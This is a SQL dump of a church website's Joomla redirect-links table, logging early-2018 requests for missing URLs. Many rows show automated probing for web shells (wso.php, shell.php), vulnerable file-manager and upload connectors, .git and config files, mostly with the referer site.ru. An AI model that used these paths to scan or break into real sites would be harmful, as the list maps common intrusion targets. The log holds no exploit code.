(7553, 'https://lifeoasisinternationalchurch.org/error_log.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 16:00:22', '0000-00-00 00:00:00', 301),
(7554, 'https://lifeoasisinternationalchurch.org/bin/passphrase.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-09 17:17:32', '0000-00-00 00:00:00', 301),
(7555, 'https://lifeoasisinternationalchurch.org/2.php', NULL, 'http://site.ru', '', 4, 0, '2018-01-09 18:20:01', '0000-00-00 00:00:00', 301),
(7556, 'https://lifeoasisinternationalchurch.org/media/system/system.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 22:39:27', '0000-00-00 00:00:00', 301),
(7557, 'https://lifeoasisinternationalchurch.org/media/editors/tinymce/skins/lib.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-10 00:26:43', '0000-00-00 00:00:00', 301),
(7558, 'https://lifeoasisinternationalchurch.org/templates/system/css/system.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-10 01:07:42', '0000-00-00 00:00:00', 301),
(7559, 'https://lifeoasisinternationalchurch.org/system.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-10 06:03:25', '0000-00-00 00:00:00', 301),
(7560, 'https://lifeoasisinternationalchurch.org/tmp/wso.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-10 08:25:06', '0000-00-00 00:00:00', 301),
(7561, 'https://unite.nike.comhttps//unite.nike.com/login?appversion=355&experienceversion=306&uxid=com.nike.commerce.nikedotcom.web&locale=zh_cn&backendenvironment=identity&browser=google inc.&os=undefined&mobile=false&native=false&visit=1&visitor=1156102d-e95b-40ec-9013-91f5b4064961', NULL, 'https://www.nike.com/cn/zh_cn/?SITESRC=launch', '', 1, 0, '2018-01-10 13:02:30', '0000-00-00 00:00:00', 301),
(7562, 'https://www.lifeoasisinternationalchurch.org/blog/', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 2, 0, '2018-01-10 13:05:45', '0000-00-00 00:00:00', 301),
(7563, 'https://142.4.21.132/xxzy', NULL, '', '', 1, 0, '2018-01-10 19:52:00', '0000-00-00 00:00:00', 301),
(7564, 'https://www.lifeoasisinternationalchurch.org/administration.php', NULL, '', '', 19, 0, '2018-01-11 06:35:01', '0000-00-00 00:00:00', 301),
(7565, 'https://www.lifeoasisinternationalchurch.org/ye', NULL, '', '', 1, 0, '2018-01-11 22:34:24', '0000-00-00 00:00:00', 301),
(7566, 'https://www.lifeoasisinternationalchurch.org/be', NULL, '', '', 1, 0, '2018-01-11 22:34:49', '0000-00-00 00:00:00', 301),
(7567, 'https://lifeoasisinternationalchurch.org/40thawc/mirror', NULL, '', '', 1, 0, '2018-01-11 23:30:05', '0000-00-00 00:00:00', 301),
(7568, 'https://www.lifeoasisinternationalchurch.org/private sreaming', NULL, '', '', 1, 0, '2018-01-11 23:45:48', '0000-00-00 00:00:00', 301),
(7569, 'https://lifeoasisinternationalchurch.org/script>', NULL, '', '', 1, 0, '2018-01-12 07:34:34', '0000-00-00 00:00:00', 301),
(7570, 'https://lifeoasisinternationalchurch.org/streaming private', NULL, '', '', 1, 0, '2018-01-12 22:02:47', '0000-00-00 00:00:00', 301),
(7571, 'https://www.lifeoasisinternationalchurch.org/straming', NULL, '', '', 11, 0, '2018-01-13 04:20:49', '0000-00-00 00:00:00', 301),
(7572, 'https://www.lifeoasisinternationalchurch.org/2011-08-10-21-22-57', NULL, '', '', 11, 0, '2018-01-13 06:05:34', '0000-00-00 00:00:00', 301),
(7573, 'https://lifeoasisinternationalchurch.org/40thawc/index.php/component/users/?view=remind', NULL, '', '', 176, 0, '2018-01-13 18:33:51', '0000-00-00 00:00:00', 301),
(7574, 'https://www.lifeoasisinternationalchurch.org/church-groups', NULL, '', '', 17, 0, '2018-01-13 20:08:31', '0000-00-00 00:00:00', 301),
(7575, 'https://lifeoasisinternationalchurch.org/40thawc/index.php/component/users/?view=reset', NULL, 'https://lifeoasisinternationalchurch.org/', '', 16, 0, '2018-01-14 01:48:27', '0000-00-00 00:00:00', 301),
(7576, 'https://lifeoasisinternationalchurch.org/loic/dailyreading.php', NULL, '', '', 9, 0, '2018-01-14 13:15:06', '0000-00-00 00:00:00', 301),
(7577, 'https://www.lifeoasisinternationalchurch.org/index.php/component/content/category/11-demo-articles', NULL, '', '', 3, 0, '2018-01-14 13:32:42', '0000-00-00 00:00:00', 301),
(7578, 'https://lifeoasisinternationalchurch.org/12-sample-content/18-sample-content-7', NULL, '', '', 10, 0, '2018-01-14 15:45:21', '0000-00-00 00:00:00', 301),
(7579, 'https://142.4.21.132/~lifeoasi/', NULL, '', '', 3, 0, '2018-01-15 11:33:05', '0000-00-00 00:00:00', 301),
(7580, 'https://lifeoasisinternationalchurch.org/resources/livestreaming/private', NULL, '', '', 1, 0, '2018-01-15 15:38:53', '0000-00-00 00:00:00', 301),
(7581, 'https://www.lifeoasisinternationalchurch.org/magazine/', NULL, 'http://www.lifeoasisinternationalchurch.org/magazine/', '', 4, 0, '2018-01-15 16:32:23', '0000-00-00 00:00:00', 301),
(7582, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/privte', NULL, '', '', 2, 0, '2018-01-16 08:06:53', '0000-00-00 00:00:00', 301),
(7583, 'https://www.lifeoasisinternationalchurch.org/styles', NULL, 'http://www.lifeoasisinternationalchurch.org/styles', '', 5, 0, '2018-01-16 08:23:09', '0000-00-00 00:00:00', 301),
(7584, 'https://lifeoasisinternationalchurch.org/side.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-01-16 08:40:45', '0000-00-00 00:00:00', 301),
(7585, 'https://lifeoasisinternationalchurch.org/asom', NULL, '', '', 4, 0, '2018-01-16 10:27:23', '0000-00-00 00:00:00', 301),
(7586, 'https://www.lifeoasisinternationalchurch.org/tutorials', NULL, 'http://www.lifeoasisinternationalchurch.org/tutorials', '', 4, 0, '2018-01-16 22:01:34', '0000-00-00 00:00:00', 301),
(7587, 'https://lifeoasisinternationalchurch.org/index.php/live-services', NULL, 'http://lifeoasisinternationalchurch.org/index.php/live-services', '', 15, 0, '2018-01-17 05:46:15', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(7588, 'https://www.lifeoasisinternationalchurch.org/resources/live-streamingthe naton is destroyed by the mouth of the wicked bible verse', NULL, '', '', 1, 0, '2018-01-18 00:25:08', '0000-00-00 00:00:00', 301),
(7589, 'https://www.lifeoasisinternationalchurch.org/whitehat', NULL, '', '', 1, 0, '2018-01-18 02:16:04', '0000-00-00 00:00:00', 301),
(7590, 'https://www.lifeoasisinternationalchurch.org/security', NULL, '', '', 1, 0, '2018-01-18 02:16:05', '0000-00-00 00:00:00', 301),
(7591, 'https://www.lifeoasisinternationalchurch.org/responsible-disclosure', NULL, '', '', 1, 0, '2018-01-18 02:16:05', '0000-00-00 00:00:00', 301),
(7592, 'https://www.lifeoasisinternationalchurch.org/bug-bounty', NULL, '', '', 1, 0, '2018-01-18 02:16:05', '0000-00-00 00:00:00', 301),
(7593, 'https://www.lifeoasisinternationalchurch.org/components/com_b2jcontact/', NULL, '', '', 3, 0, '2018-01-18 12:12:29', '0000-00-00 00:00:00', 301),
(7594, 'https://lifeoasisinternationalchurch.org/wp-content_plugins_akismet_widget.php', NULL, '', '', 2, 0, '2018-01-19 07:55:36', '0000-00-00 00:00:00', 301),
(7595, 'https://www.lifeoasisinternationalchurch.org/asom', NULL, '', '', 16, 0, '2018-01-19 12:52:59', '0000-00-00 00:00:00', 301),
(7596, 'https://lifeoasisinternationalchurch.org/media/joomla-update.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-01-19 16:49:45', '0000-00-00 00:00:00', 301),
(7597, 'https://www.lifeoasisinternationalchurch.org/streaming/akure anniversary', NULL, '', '', 1, 0, '2018-01-19 19:42:59', '0000-00-00 00:00:00', 301),
(7598, 'https://www.lifeoasisinternationalchurch.org/featured-messages', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 11, 0, '2018-01-20 14:20:49', '0000-00-00 00:00:00', 301),
(7599, 'https://lifeoasisinternationalchurch.org/wp-content/plugins/project.ziplast/uploader/server/php/files/', NULL, 'http://lifeoasisinternationalchurch.org/wp-content/plugins/project.ziplast/uploader/server/php/files/', '', 1, 0, '2018-01-20 22:30:27', '0000-00-00 00:00:00', 301),
(7600, 'https://www.lifeoasisinternationalchurch.org/prayer/component/mailto/?tmpl=component&template=prayer5&link=0bfef1e5ce43cc2f86602fcd970ea704cd5a5cf6', NULL, '', '', 1, 0, '2018-01-21 01:19:02', '0000-00-00 00:00:00', 301),
(7601, 'https://www.lifeoasisinternationalchurch.org/sg', NULL, '', '', 2, 0, '2018-01-21 09:21:05', '0000-00-00 00:00:00', 301),
(7602, 'https://www.lifeoasisinternationalchurch.org/asom2018', NULL, '', '', 1, 0, '2018-01-21 13:36:50', '0000-00-00 00:00:00', 301),
(7603, 'https://142.4.21.132/downloader/', NULL, '', '', 2, 0, '2018-01-22 10:56:37', '0000-00-00 00:00:00', 301),
(7604, 'https://lifeoasisinternationalchurch.org/component/jcomments/captcha/44737', NULL, '', '', 1, 0, '2018-01-22 13:01:58', '0000-00-00 00:00:00', 301),
(7605, 'https://lifeoasisinternationalchurch.org/asom20188', NULL, '', '', 1, 0, '2018-01-22 23:21:22', '0000-00-00 00:00:00', 301),
(7606, 'https://lifeoasisinternationalchurch.org/asom2018/admin', NULL, '', '', 2, 0, '2018-01-22 23:56:04', '0000-00-00 00:00:00', 301),
(7607, 'https://www.lifeoasisinternationalchurch.org/prayer/component/mailto/?tmpl=component&template=prayer5&link=8c51e9ae8bb5c94cc452179d1f2bb5316fce822d', NULL, '', '', 1, 0, '2018-01-23 00:15:33', '0000-00-00 00:00:00', 301),
(7608, 'https://lifeoasisinternationalchurch.org/upload/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/upload/server/php/', '', 1, 0, '2018-01-23 04:29:35', '0000-00-00 00:00:00', 301),
(7609, 'https://lifeoasisinternationalchurch.org/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/server/php/', '', 3, 0, '2018-01-23 05:04:05', '0000-00-00 00:00:00', 301),
(7610, 'https://lifeoasisinternationalchurch.org/featured-messages', NULL, '', '', 24, 0, '2018-01-24 08:35:29', '0000-00-00 00:00:00', 301),
(7611, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=mtc-mkygeh0', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-01-24 17:30:21', '0000-00-00 00:00:00', 301),
(7612, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/images/demo/video/envato_sting.webm', NULL, '', '', 5, 0, '2018-01-24 19:55:00', '0000-00-00 00:00:00', 301),
(7613, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/images/demo/video/envato_sting.mp4', NULL, '', '', 6, 0, '2018-01-24 19:55:03', '0000-00-00 00:00:00', 301),
(7614, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/images/demo/video/envato_sting.ogv', NULL, '', '', 9, 0, '2018-01-24 19:55:06', '0000-00-00 00:00:00', 301),
(7615, 'https://lifeoasisinternationalchurch.org/jquery-file-upload/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/jquery-file-upload/server/php/', '', 1, 0, '2018-01-24 21:59:50', '0000-00-00 00:00:00', 301),
(7616, 'https://www.lifeoasisinternationalchurch.org/fck/editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-25 11:27:55', '0000-00-00 00:00:00', 301),
(7617, 'https://www.lifeoasisinternationalchurch.org/fck/editor/filemanager/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-25 11:28:00', '0000-00-00 00:00:00', 301),
(7618, 'https://www.lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-25 11:28:04', '0000-00-00 00:00:00', 301),
(7619, 'https://www.lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-25 11:28:08', '0000-00-00 00:00:00', 301),
(7620, 'https://lifeoasisinternationalchurch.org/asom2018/administrator/i', NULL, '', '', 1, 0, '2018-01-25 13:15:33', '0000-00-00 00:00:00', 301),
(7621, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/10', NULL, '', '', 1, 0, '2018-01-25 14:34:42', '0000-00-00 00:00:00', 301),
(7622, 'https://www.lifeoasisinternationalchurch.org/jquery-file-upload/server/php/', NULL, 'http://www.lifeoasisinternationalchurch.org/jquery-file-upload/server/php/', '', 1, 0, '2018-01-25 23:58:49', '0000-00-00 00:00:00', 301),
(7623, 'https://lifeoasisinternationalchurch.org/phpinfo.php', NULL, '', '', 4, 0, '2018-01-26 07:14:32', '0000-00-00 00:00:00', 301),
(7624, 'https://lifeoasisinternationalchurch.org/upload/_dispatch.php', NULL, 'http://lifeoasisinternationalchurch.org/upload/_dispatch.php', '', 1, 0, '2018-01-26 15:33:01', '0000-00-00 00:00:00', 301),
(7625, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 2, 0, '2018-01-27 14:44:05', '0000-00-00 00:00:00', 301),
(7626, 'https://www.lifeoasisinternationalchurch.org/klfhsyys', NULL, 'http://www.lifeoasisinternationalchurch.org/KlfhsYYs', '', 1, 0, '2018-01-27 16:44:36', '0000-00-00 00:00:00', 301),
(7627, 'https://mail.lifeoasisinternationalchurch.org/.git/head', NULL, '', '', 1, 0, '2018-01-27 20:20:44', '0000-00-00 00:00:00', 301),
(7628, 'https://lifeoasisinternationalchurch.org/fck/editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-27 20:27:59', '0000-00-00 00:00:00', 301),
(7629, 'https://lifeoasisinternationalchurch.org/fck/editor/filemanager/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-27 20:28:03', '0000-00-00 00:00:00', 301),
(7630, 'https://lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 4, 0, '2018-01-27 20:28:07', '0000-00-00 00:00:00', 301),
(7631, 'https://lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2018-01-27 20:28:10', '0000-00-00 00:00:00', 301),
(7632, 'https://www.lifeoasisinternationalchurch.org/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2018-01-29 06:50:37', '0000-00-00 00:00:00', 301),
(7633, 'https://lifeoasisinternationalchurch.org/language/en-gb/error.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-29 12:53:27', '0000-00-00 00:00:00', 301),
(7634, 'https://lifeoasisinternationalchurch.org/prom.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-29 15:05:23', '0000-00-00 00:00:00', 301),
(7635, 'https://lifeoasisinternationalchurch.org/shell.php', NULL, 'http://site.ru', '', 5, 0, '2018-01-29 16:07:50', '0000-00-00 00:00:00', 301),
(7636, 'https://lifeoasisinternationalchurch.org/xgasupx.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-29 16:55:14', '0000-00-00 00:00:00', 301),
(7637, 'https://www.lifeoasisinternationalchurch.org/asom201', NULL, '', '', 1, 0, '2018-01-29 21:40:26', '0000-00-00 00:00:00', 301),
(7638, 'https://lifeoasisinternationalchurch.org/tags.php', NULL, 'http://site.ru', '', 4, 0, '2018-01-29 21:52:35', '0000-00-00 00:00:00', 301),
(7639, 'https://lifeoasisinternationalchurch.org/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 2, 0, '2018-01-30 17:34:14', '0000-00-00 00:00:00', 301),
(7640, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/47-prayer-a-fasting-day-36', NULL, '', '', 9, 0, '2018-01-30 17:34:15', '0000-00-00 00:00:00', 301),
(7641, 'https://www.lifeoasisinternationalchurch.org/47-prayer-a-fasting-day-38', NULL, '', '', 2, 0, '2018-01-30 17:34:18', '0000-00-00 00:00:00', 301),
(7642, 'https://lifeoasisinternationalchurch.org/0.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-31 20:30:17', '0000-00-00 00:00:00', 301),
(7643, 'https://unite.nike.comhttps//unite.nike.com/login?appversion=362&experienceversion=310&uxid=com.nike.commerce.nikedotcom.web&locale=zh_cn&backendenvironment=identity&browser=google inc.&os=undefined&mobile=false&native=false&visit=1&visitor=1156102d-e95b-40ec-9013-91f5b4064961', NULL, 'https://www.nike.com/cn/zh_cn/?SITESRC=launch', '', 1, 0, '2018-01-31 20:59:10', '0000-00-00 00:00:00', 301),
(7644, 'https://lifeoasisinternationalchurch.org/plss.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 10:00:53', '0000-00-00 00:00:00', 301),
(7645, 'https://lifeoasisinternationalchurch.org/forum/logo_img.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 10:59:50', '0000-00-00 00:00:00', 301),
(7646, 'https://lifeoasisinternationalchurch.org/cli/lastupdate.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-01 12:17:29', '0000-00-00 00:00:00', 301),
(7647, 'https://www.lifeoasisinternationalchurch.org/stree', NULL, '', '', 1, 0, '2018-02-01 12:34:09', '0000-00-00 00:00:00', 301),
(7648, 'https://lifeoasisinternationalchurch.org/q3okr9.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 16:04:34', '0000-00-00 00:00:00', 301),
(7649, 'https://lifeoasisinternationalchurch.org/star/plugins/vmpayment/standard/language/en-gb/kimwv.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 16:56:33', '0000-00-00 00:00:00', 301),
(7650, 'https://lifeoasisinternationalchurch.org/404.php', NULL, 'http://site.ru', '', 6, 0, '2018-02-01 17:02:57', '0000-00-00 00:00:00', 301),
(7651, 'https://lifeoasisinternationalchurch.org/kerwqh.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-01 17:57:23', '0000-00-00 00:00:00', 301),
(7652, 'https://lifeoasisinternationalchurch.org/log/logs/error.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 17:57:34', '0000-00-00 00:00:00', 301),
(7653, 'https://lifeoasisinternationalchurch.org/language/en-gb/bctsd.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-01 19:45:43', '0000-00-00 00:00:00', 301),
(7654, 'https://lifeoasisinternationalchurch.org/language/en-gb/bahvimq.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 19:46:34', '0000-00-00 00:00:00', 301),
(7655, 'https://lifeoasisinternationalchurch.org/language/en-gb/bahvimq.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 19:46:34', '0000-00-00 00:00:00', 301),
(7656, 'https://lifeoasisinternationalchurch.org/subzero/account-validation/file/file.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 19:48:14', '0000-00-00 00:00:00', 301),
(7657, 'https://lifeoasisinternationalchurch.org/language/shell.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-01 20:34:59', '0000-00-00 00:00:00', 301),
(7658, 'https://lifeoasisinternationalchurch.org/nova', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 21:28:29', '0000-00-00 00:00:00', 301),
(7659, 'https://lifeoasisinternationalchurch.org/components/com_virtuemart/themes/default/templates/browse/sql-ou.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-01 22:09:22', '0000-00-00 00:00:00', 301),
(7660, 'https://lifeoasisinternationalchurch.org/microsoft1/account-validation/file/file.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-01 22:31:20', '0000-00-00 00:00:00', 301),
(7661, 'https://lifeoasisinternationalchurch.org/live/account-validation/file/file.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-01 23:16:21', '0000-00-00 00:00:00', 301),
(7662, 'https://lifeoasisinternationalchurch.org/xcontact182.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-02 00:54:00', '0000-00-00 00:00:00', 301),
(7663, 'https://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/nsis/pouimeq.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-02 01:04:21', '0000-00-00 00:00:00', 301),
(7664, 'https://lifeoasisinternationalchurch.org/templates/go_roundy/css/omquas.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-02 03:58:40', '0000-00-00 00:00:00', 301),
(7665, 'https://lifeoasisinternationalchurch.org/tounsicoke.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-02 04:00:56', '0000-00-00 00:00:00', 301),
(7666, 'https://lifeoasisinternationalchurch.org/editor/zlrzvnb.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-02 04:22:28', '0000-00-00 00:00:00', 301),
(7667, 'https://lifeoasisinternationalchurch.org/tmp/x.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-02 04:39:48', '0000-00-00 00:00:00', 301),
(7668, 'https://lifeoasisinternationalchurch.org/w.php', NULL, 'http://site.ru', '', 4, 0, '2018-02-02 06:06:24', '0000-00-00 00:00:00', 301),
(7669, 'https://lifeoasisinternationalchurch.org/media/com_finder/js/wrkim.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-02 06:42:20', '0000-00-00 00:00:00', 301),
(7670, 'https://lifeoasisinternationalchurch.org/seller82_5421508cdcc345075ecbf9bdd905afeb.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-02 06:49:07', '0000-00-00 00:00:00', 301),
(7671, 'https://www.lifeoasisinternationalchurch.org/asom2018/live streaming', NULL, '', '', 1, 0, '2018-02-02 06:56:49', '0000-00-00 00:00:00', 301),
(7672, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 5, 0, '2018-02-02 11:33:33', '0000-00-00 00:00:00', 301),
(7673, 'https://www.lifeoasisinternationalchurch.org/livw', NULL, '', '', 1, 0, '2018-02-02 12:42:24', '0000-00-00 00:00:00', 301),
(7674, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/15811', NULL, '', '', 1, 0, '2018-02-02 13:03:06', '0000-00-00 00:00:00', 301),
(7675, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/48906', NULL, '', '', 1, 0, '2018-02-02 13:03:54', '0000-00-00 00:00:00', 301),
(7676, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/26168', NULL, '', '', 1, 0, '2018-02-02 13:05:23', '0000-00-00 00:00:00', 301),
(7677, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/77435', NULL, '', '', 1, 0, '2018-02-02 13:10:06', '0000-00-00 00:00:00', 301),
(7678, 'https://lifeoasisinternationalchurch.org/35-prayer-a-fasting-day-26', NULL, '', '', 5, 0, '2018-02-03 04:44:18', '0000-00-00 00:00:00', 301),
(7679, 'https://lifeoasisinternationalchurch.org/cli/w.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-03 21:24:24', '0000-00-00 00:00:00', 301),
(7680, 'https://www.lifeoasisinternationalchurch.org/resources/blog/item/k2container', NULL, '', '', 5, 0, '2018-02-03 22:42:28', '0000-00-00 00:00:00', 301),
(7681, 'https://www.lifeoasisinternationalchurch.org/loic/thronemusic.php', NULL, '', '', 8, 0, '2018-02-03 23:55:05', '0000-00-00 00:00:00', 301),
(7682, 'https://www.lifeoasisinternationalchurch.org/asom/registration', NULL, '', '', 1, 0, '2018-02-04 02:33:36', '0000-00-00 00:00:00', 301),
(7683, 'https://lifeoasisinternationalchurch.org/asom registration', NULL, '', '', 1, 0, '2018-02-04 02:59:38', '0000-00-00 00:00:00', 301),
(7684, 'https://lifeoasisinternationalchurch.org/asom2018/register', NULL, '', '', 1, 0, '2018-02-04 03:20:06', '0000-00-00 00:00:00', 301),
(7685, 'https://lifeoasisinternationalchurch.org/asom2018/registration', NULL, '', '', 1, 0, '2018-02-04 03:20:41', '0000-00-00 00:00:00', 301),
(7686, 'https://lifeoasisinternationalchurch.org/home.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-04 03:46:35', '0000-00-00 00:00:00', 301),
(7687, 'https://lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/', NULL, '', '', 3, 0, '2018-02-04 06:18:55', '0000-00-00 00:00:00', 301),
(7688, 'https://lifeoasisinternationalchurch.org/mod_ariimageslidersa.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-04 14:07:09', '0000-00-00 00:00:00', 301),
(7689, 'https://lifeoasisinternationalchurch.org/register/', NULL, '', '', 17, 0, '2018-02-04 19:52:30', '0000-00-00 00:00:00', 301),
(7690, 'https://lifeoasisinternationalchurch.org/login.php', NULL, '', '', 4, 0, '2018-02-04 19:52:34', '0000-00-00 00:00:00', 301),
(7691, 'https://lifeoasisinternationalchurch.org/signup.php', NULL, '', '', 4, 0, '2018-02-04 19:52:37', '0000-00-00 00:00:00', 301),
(7692, 'https://lifeoasisinternationalchurch.org//xmlrpc.php?rsd', NULL, '', '', 3, 0, '2018-02-04 20:01:26', '0000-00-00 00:00:00', 301),
(7693, 'https://www.lifeoasisinternationalchurch.org/ministries/outreach/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2018-02-04 22:12:19', '0000-00-00 00:00:00', 301),
(7694, 'https://www.lifeoasisinternationalchurch.org//xmlrpc.php?rsd', NULL, '', '', 15, 0, '2018-02-05 04:12:19', '0000-00-00 00:00:00', 301),
(7695, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=register', NULL, '', '', 137, 0, '2018-02-05 08:31:08', '0000-00-00 00:00:00', 301),
(7696, 'https://lifeoasisinternationalchurch.org/sph.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-02-05 20:15:34', '0000-00-00 00:00:00', 301),
(7697, 'https://lifeoasisinternationalchurch.org/inlos.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-02-05 20:19:24', '0000-00-00 00:00:00', 301),
(7698, 'https://lifeoasisinternationalchurch.org/index.php/18-loic/35-trm', NULL, '', '', 5, 0, '2018-02-06 01:56:34', '0000-00-00 00:00:00', 301),
(7699, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/', NULL, '', '', 3, 0, '2018-02-07 02:21:02', '0000-00-00 00:00:00', 301),
(7700, 'https://www.lifeoasisinternationalchurch.org/livstreaming', NULL, '', '', 1, 0, '2018-02-07 16:36:29', '0000-00-00 00:00:00', 301),
(7701, 'https://lifeoasisinternationalchurch.org/aul.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-08 08:22:13', '0000-00-00 00:00:00', 301),
(7702, 'https://lifeoasisinternationalchurch.org/food.php', NULL, 'http://site.ru', '', 6, 0, '2018-02-08 09:10:47', '0000-00-00 00:00:00', 301),
(7703, 'https://lifeoasisinternationalchurch.org/hexhglal.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-08 12:19:51', '0000-00-00 00:00:00', 301),
(7704, 'https://lifeoasisinternationalchurch.org/tmp/abc.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-08 16:30:09', '0000-00-00 00:00:00', 301),
(7705, 'https://lifeoasisinternationalchurch.org/index8632.php', NULL, 'http://site.ru', '', 2, 0, '2018-02-08 19:02:38', '0000-00-00 00:00:00', 301),
(7706, 'https://lifeoasisinternationalchurch.org/b.php', NULL, 'http://site.ru', '', 9, 0, '2018-02-08 19:24:44', '0000-00-00 00:00:00', 301),
(7707, 'https://lifeoasisinternationalchurch.org/df.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 01:31:56', '0000-00-00 00:00:00', 301),
(7708, 'https://lifeoasisinternationalchurch.org/c.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-09 01:32:16', '0000-00-00 00:00:00', 301),
(7709, 'https://lifeoasisinternationalchurch.org/hello.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 01:37:31', '0000-00-00 00:00:00', 301),
(7710, 'https://lifeoasisinternationalchurch.org/mary.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 01:38:31', '0000-00-00 00:00:00', 301),
(7711, 'https://lifeoasisinternationalchurch.org/generationmap.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 01:38:43', '0000-00-00 00:00:00', 301),
(7712, 'https://lifeoasisinternationalchurch.org/templates/system/template.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 04:45:02', '0000-00-00 00:00:00', 301),
(7713, 'https://lifeoasisinternationalchurch.org/elfinder/php/connector.php', NULL, 'http://lifeoasisinternationalchurch.org/elfinder/php/connector.php', '', 3, 0, '2018-02-09 05:08:49', '0000-00-00 00:00:00', 301),
(7714, 'https://lifeoasisinternationalchurch.org/lndex.php', NULL, 'http://site.ru', '', 3, 0, '2018-02-09 05:27:32', '0000-00-00 00:00:00', 301),
(7715, 'https://lifeoasisinternationalchurch.org/categories.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 06:10:32', '0000-00-00 00:00:00', 301),
(7716, 'https://lifeoasisinternationalchurch.org/db-config.php', NULL, 'http://site.ru', '', 1, 0, '2018-02-09 07:29:27', '0000-00-00 00:00:00', 301),
